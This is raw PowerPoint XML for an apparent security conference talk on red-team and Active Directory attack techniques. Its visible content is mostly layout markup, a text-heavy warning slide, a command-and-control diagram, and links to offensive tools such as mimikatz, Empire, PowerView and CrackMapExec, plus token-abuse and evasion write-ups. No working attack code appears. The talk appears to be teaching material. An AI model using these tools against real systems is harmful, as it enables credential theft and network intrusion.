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131"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="529" r:id="rId2"/>
    <p:sldId id="380" r:id="rId3"/>
    <p:sldId id="256" r:id="rId4"/>
    <p:sldId id="528" r:id="rId5"/>
    <p:sldId id="350" r:id="rId6"/>
    <p:sldId id="283" r:id="rId7"/>
    <p:sldId id="345" r:id="rId8"/>
    <p:sldId id="527" r:id="rId9"/>
    <p:sldId id="352" r:id="rId10"/>
    <p:sldId id="354" r:id="rId11"/>
    <p:sldId id="355" r:id="rId12"/>
    <p:sldId id="418" r:id="rId13"/>
    <p:sldId id="427" r:id="rId14"/>
    <p:sldId id="499" r:id="rId15"/>
    <p:sldId id="500" r:id="rId16"/>
    <p:sldId id="501" r:id="rId17"/>
    <p:sldId id="502" r:id="rId18"/>
    <p:sldId id="503" r:id="rId19"/>
    <p:sldId id="491" r:id="rId20"/>
    <p:sldId id="490" r:id="rId21"/>
    <p:sldId id="456" r:id="rId22"/>
    <p:sldId id="462" r:id="rId23"/>
    <p:sldId id="466" r:id="rId24"/>
    <p:sldId id="463" r:id="rId25"/>
    <p:sldId id="464" r:id="rId26"/>
    <p:sldId id="465" r:id="rId27"/>
    <p:sldId id="488" r:id="rId28"/>
    <p:sldId id="504" r:id="rId29"/>
    <p:sldId id="485" r:id="rId30"/>
    <p:sldId id="507" r:id="rId31"/>
    <p:sldId id="508" r:id="rId32"/>
    <p:sldId id="509" r:id="rId33"/>
    <p:sldId id="510" r:id="rId34"/>
    <p:sldId id="486" r:id="rId35"/>
    <p:sldId id="495" r:id="rId36"/>
    <p:sldId id="585" r:id="rId37"/>
    <p:sldId id="519" r:id="rId38"/>
    <p:sldId id="523" r:id="rId39"/>
    <p:sldId id="520" r:id="rId40"/>
    <p:sldId id="521" r:id="rId41"/>
    <p:sldId id="522" r:id="rId42"/>
    <p:sldId id="493" r:id="rId43"/>
    <p:sldId id="524" r:id="rId44"/>
    <p:sldId id="492" r:id="rId45"/>
    <p:sldId id="494" r:id="rId46"/>
    <p:sldId id="511" r:id="rId47"/>
    <p:sldId id="514" r:id="rId48"/>
    <p:sldId id="515" r:id="rId49"/>
    <p:sldId id="516" r:id="rId50"/>
    <p:sldId id="518" r:id="rId51"/>
    <p:sldId id="546" r:id="rId52"/>
    <p:sldId id="474" r:id="rId53"/>
    <p:sldId id="475" r:id="rId54"/>
    <p:sldId id="476" r:id="rId55"/>
    <p:sldId id="477" r:id="rId56"/>
    <p:sldId id="526" r:id="rId57"/>
    <p:sldId id="498" r:id="rId58"/>
    <p:sldId id="497" r:id="rId59"/>
    <p:sldId id="478" r:id="rId60"/>
    <p:sldId id="547" r:id="rId61"/>
    <p:sldId id="548" r:id="rId62"/>
    <p:sldId id="480" r:id="rId63"/>
    <p:sldId id="481" r:id="rId64"/>
    <p:sldId id="482" r:id="rId65"/>
    <p:sldId id="483" r:id="rId66"/>
    <p:sldId id="484" r:id="rId67"/>
    <p:sldId id="576" r:id="rId68"/>
    <p:sldId id="582" r:id="rId69"/>
    <p:sldId id="581" r:id="rId70"/>
    <p:sldId id="580" r:id="rId71"/>
    <p:sldId id="579" r:id="rId72"/>
    <p:sldId id="578" r:id="rId73"/>
    <p:sldId id="577" r:id="rId74"/>
    <p:sldId id="566" r:id="rId75"/>
    <p:sldId id="583" r:id="rId76"/>
    <p:sldId id="584" r:id="rId77"/>
    <p:sldId id="533" r:id="rId78"/>
    <p:sldId id="534" r:id="rId79"/>
    <p:sldId id="535" r:id="rId80"/>
    <p:sldId id="532" r:id="rId81"/>
    <p:sldId id="531" r:id="rId82"/>
    <p:sldId id="538" r:id="rId83"/>
    <p:sldId id="539" r:id="rId84"/>
    <p:sldId id="545" r:id="rId85"/>
    <p:sldId id="540" r:id="rId86"/>
    <p:sldId id="541" r:id="rId87"/>
    <p:sldId id="542" r:id="rId88"/>
    <p:sldId id="550" r:id="rId89"/>
    <p:sldId id="543" r:id="rId90"/>
    <p:sldId id="549" r:id="rId91"/>
    <p:sldId id="544" r:id="rId92"/>
    <p:sldId id="450" r:id="rId93"/>
    <p:sldId id="449" r:id="rId94"/>
    <p:sldId id="536" r:id="rId95"/>
    <p:sldId id="452" r:id="rId96"/>
    <p:sldId id="451" r:id="rId97"/>
    <p:sldId id="551" r:id="rId98"/>
    <p:sldId id="558" r:id="rId99"/>
    <p:sldId id="552" r:id="rId100"/>
    <p:sldId id="557" r:id="rId101"/>
    <p:sldId id="554" r:id="rId102"/>
    <p:sldId id="559" r:id="rId103"/>
    <p:sldId id="561" r:id="rId104"/>
    <p:sldId id="562" r:id="rId105"/>
    <p:sldId id="563" r:id="rId106"/>
    <p:sldId id="560" r:id="rId107"/>
    <p:sldId id="564" r:id="rId108"/>
    <p:sldId id="565" r:id="rId109"/>
    <p:sldId id="586" r:id="rId110"/>
    <p:sldId id="420" r:id="rId111"/>
    <p:sldId id="567" r:id="rId112"/>
    <p:sldId id="568" r:id="rId113"/>
    <p:sldId id="569" r:id="rId114"/>
    <p:sldId id="570" r:id="rId115"/>
    <p:sldId id="469" r:id="rId116"/>
    <p:sldId id="571" r:id="rId117"/>
    <p:sldId id="470" r:id="rId118"/>
    <p:sldId id="587" r:id="rId119"/>
    <p:sldId id="472" r:id="rId120"/>
    <p:sldId id="473" r:id="rId121"/>
    <p:sldId id="409" r:id="rId122"/>
    <p:sldId id="572" r:id="rId123"/>
    <p:sldId id="525" r:id="rId124"/>
    <p:sldId id="573" r:id="rId125"/>
    <p:sldId id="574" r:id="rId126"/>
    <p:sldId id="453" r:id="rId127"/>
    <p:sldId id="417" r:id="rId128"/>
    <p:sldId id="379" r:id="rId129"/>
    <p:sldId id="575" r:id="rId13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2FC32"/>
    <a:srgbClr val="003C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7" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="83" d="100"/>
          <a:sy n="83" d="100"/>
        </p:scale>
        <p:origin x="96" y="13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theme" Target="theme/theme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tableStyles" Target="tableStyle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presProps" Target="pres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3E0BA58-3B22-492B-AEC7-2527FE4DDDF2}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2/13/2018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277F8A5-E82C-458F-82BF-2E8D775E12BA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19372159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dirty="0"/>
              <a:t>2/13/2018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2/13/2018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2/13/2018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4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="3771174"/>
            <a:ext cx="7279649" cy="342174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1400" b="0" i="0" kern="1200" cap="small" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>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2/13/2018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
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>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2/13/2018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2/13/2018</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2/13/2018</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2/13/2018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2/13/2018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2/13/2018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2/13/2018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509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018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509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018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4509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018</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509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018</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4"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7" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018</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2/13/2018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9012"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509A250-FF31-4206-8172-F9D3106AACB1}" type="datetimeFigureOut">
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2/13/2018</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02111984F565}" type="slidenum">
              <a:rPr lang="en-US" dirty="0"/>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64" r:id="rId12"/>
    <p:sldLayoutId id="2147483662" r:id="rId13"/>
    <p:sldLayoutId id="2147483669" r:id="rId14"/>
    <p:sldLayoutId id="2147483670" r:id="rId15"/>
    <p:sldLayoutId id="2147483658" r:id="rId16"/>
    <p:sldLayoutId id="2147483659"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4.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.sv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svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.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svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.sv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svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="Externa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hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="Externa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hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="Externa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hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="Externa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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.christophertruncer.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rmusser01/Infosec_Reference/tree/master/Draft" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.labofapenetrationtester.com/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.exploit-monday.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rmusser.net/docs/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.microsoft.com/en-us/advanced-threat-analytics/what-is-ata" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/archive" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.harmj0y.net/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cptjesus.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wald0.com/?p=112" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide124.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation/amp/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/askds/2017/04/05/using-debugging-tools-to-find-token-and-session-leaks/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/hatRiot/token-priv/master/abusing_token_eop_1.0.txt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secureidentity.se/acl-dacl-sacl-and-the-ace/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.itprotoday.com/security/understanding-process-tokens" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://foxglovesecurity.com/2016/01/16/hot-potato/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://adsecurity.org/?page_id=1821" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/eu-17/materials/eu-17-Thompson-Red-Team-Techniques-For-Evading-Bypassing-And-Disabling-MS-Advanced-Threat-Protection-And-Advanced-Threat-Analytics.pdf" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide125.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/EmpireProject/Empire" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/leechristensen/UnmanagedPowerShell" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secureidentity.se/acl-dacl-sacl-and-the-ace/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gentilkiwi/mimikatz" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/CrackMapExec" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://live.sysinternals.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/BloodHoundAD/BloodHound" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-CradleCrafter" TargetMode="Externa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hyperlink" Target="https://bsideskc2018.busyconf.com/bookings/new" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide129.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/h3xg4m3s" TargetMode="Externa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github.com/h3xg4m3s" TargetMode="Externa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hyperlink" Target="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" TargetMode="Externa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16.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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hyperlink" Target="https://www.twitter.com/_wald0" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/harmj0y" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/CptJesus" TargetMode="Externa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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WARNING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1244991" y="2391508"/>
            <a:ext cx="9878230" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>There is a lot of text in this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" err="1"/>
              <a:t>preso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Graphic 4" descr="Warning">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D14D0E3-7962-48D4-AD29-BD744F61FE8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717722" y="63504"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Warning">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161492DF-F659-4124-BEBA-B7589D32C25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468999" y="63504"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1398439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4BEB848A-3F78-42C2-B984-C82B48AC4554}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4062657" y="1917575"/>
            <a:ext cx="2225308" cy="4793855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="75000"/>
              <a:alpha val="52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780C6906-F43A-404D-A30E-9B2C28D7FA95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2370338" y="1917576"/>
            <a:ext cx="1555839" cy="4776251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:alpha val="52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E89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command &amp; Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Better Setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A2AC06-47C4-4E25-AE97-8EBDFDC1A6D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463890" y="1835689"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Graphic 13" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33555083-91A0-41AF-BB24-C4C19706640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126532" y="3213372"/>
            <a:ext cx="1349879" cy="1349879"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Cloud 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B13E2599-9525-4EAF-8AF4-A1118E93EA3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6613864" y="3000414"/>
            <a:ext cx="2596796" cy="1758017"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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Graphic 16" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7CC9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45055" y="3492004"/>
            <a:ext cx="1038046" cy="1140710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ED1E48-D78D-423A-B918-6E5B7DD2C170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7387552" y="3637460"/>
            <a:ext cx="1362974" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="137877" y="4448047"/>
            <a:ext cx="1983886" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66DE040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
